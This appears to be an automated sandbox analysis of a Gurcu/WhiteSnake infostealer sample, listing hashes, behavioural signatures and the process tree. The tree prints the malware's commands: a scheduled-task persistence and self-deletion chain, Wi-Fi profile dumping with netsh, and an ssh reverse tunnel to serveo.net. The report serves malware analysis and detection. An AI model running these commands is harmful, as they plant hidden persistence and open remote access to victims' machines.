Analysis

  • max time kernel
    152s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    14-10-2023 03:47

General

  • Target

    Vfd663501e1ac13eb331505b8388e675450.exe

  • Size

    121KB

  • MD5

    35625d89730f70f12ecdeaf795722865

  • SHA1

    0fedcad5039e3317d0e434bb038b81850e8f3599

  • SHA256

    0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5

  • SHA512

    edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

  • SSDEEP

    3072:qQ2NGg7V7MOrwPRT3KhM9bFcLyoDtfXtRW5FhpAB0H/aAz:aGmg9bFc/p25FJa

Malware Config

Signatures

  • Detect Gurcu Stealer V3 payload (6 IoCs)
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Deletes itself (1 IoCs)
  • Executes dropped EXE (3 IoCs)
  • Loads dropped DLL (1 IoCs)
  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  • Looks up external IP address via web service (1 IoCs)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) (1 TTPs, 1 IoCs)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store (2 TTPs, 2 IoCs)
  • Runs ping.exe (1 TTPs, 1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (3 IoCs)
  • Suspicious use of WriteProcessMemory (46 IoCs)
  • Uses Task Scheduler COM API (1 TTPs)

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path (1 IoCs)
  • outlook_win_path (1 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe
    "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2472
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
        PID:2624
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:2664
      • C:\Windows\system32\schtasks.exe
        schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:2420
      • C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
        "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1268
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {A3823695-31D8-4472-9AEF-FFF4FF5F1648} S-1-5-21-3185155662-718608226-894467740-1000:YETUIZPU\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
      C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:2980
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1652
        • C:\Windows\system32\chcp.com
          chcp 65001
          4⤵
          PID:2040
        • C:\Windows\system32\netsh.exe
          netsh wlan show profiles
          4⤵
          PID:1152
        • C:\Windows\system32\findstr.exe
          findstr /R /C:"[ ]:[ ]"
          4⤵
          PID:2400
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2364
        • C:\Windows\system32\findstr.exe
          findstr "SSID BSSID Signal"
          4⤵
          PID:936
        • C:\Windows\system32\netsh.exe
          netsh wlan show networks mode=bssid
          4⤵
          PID:800
        • C:\Windows\system32\chcp.com
          chcp 65001
          4⤵
          PID:2804
      • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
        "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7396 serveo.net
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:1064

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll (also recorded as \Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll)
    Filesize: 1.5MB
    MD5: 79a6e2268dfdba1d94c27f4b17265ff4
    SHA1: b17eed8cb6f454700f8bfcfd315d5627d3cf741c
    SHA256: 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
    SHA512: 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

  • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
    Filesize: 914KB
    MD5: d1ce628a81ab779f1e8f7bf7df1bb32c
    SHA1: 011c90c704bb4782001d6e6ce1c647bf2bb17e01
    SHA256: 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
    SHA512: de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

  • C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
    Filesize: 121KB
    MD5: 35625d89730f70f12ecdeaf795722865
    SHA1: 0fedcad5039e3317d0e434bb038b81850e8f3599
    SHA256: 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
    SHA512: edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

  • memory/1268-19-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
    Filesize: 9.9MB

  • memory/1268-18-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
    Filesize: 9.9MB

  • memory/1980-7-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
    Filesize: 9.9MB

  • memory/1980-0-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
    Filesize: 9.9MB

  • memory/1980-4-0x000000001B940000-0x000000001B9C0000-memory.dmp
    Filesize: 512KB

  • memory/1980-3-0x000000001B940000-0x000000001B9C0000-memory.dmp
    Filesize: 512KB

  • memory/1980-2-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
    Filesize: 9.9MB

  • memory/1980-1-0x0000000001030000-0x0000000001054000-memory.dmp
    Filesize: 144KB

  • memory/2980-13-0x000000001ACE0000-0x000000001AD60000-memory.dmp
    Filesize: 512KB

  • memory/2980-14-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
    Filesize: 9.9MB

  • memory/2980-15-0x000000001ACE0000-0x000000001AD60000-memory.dmp
    Filesize: 512KB

  • memory/2980-12-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
    Filesize: 9.9MB

  • memory/2980-11-0x0000000000890000-0x00000000008B4000-memory.dmp
    Filesize: 144KB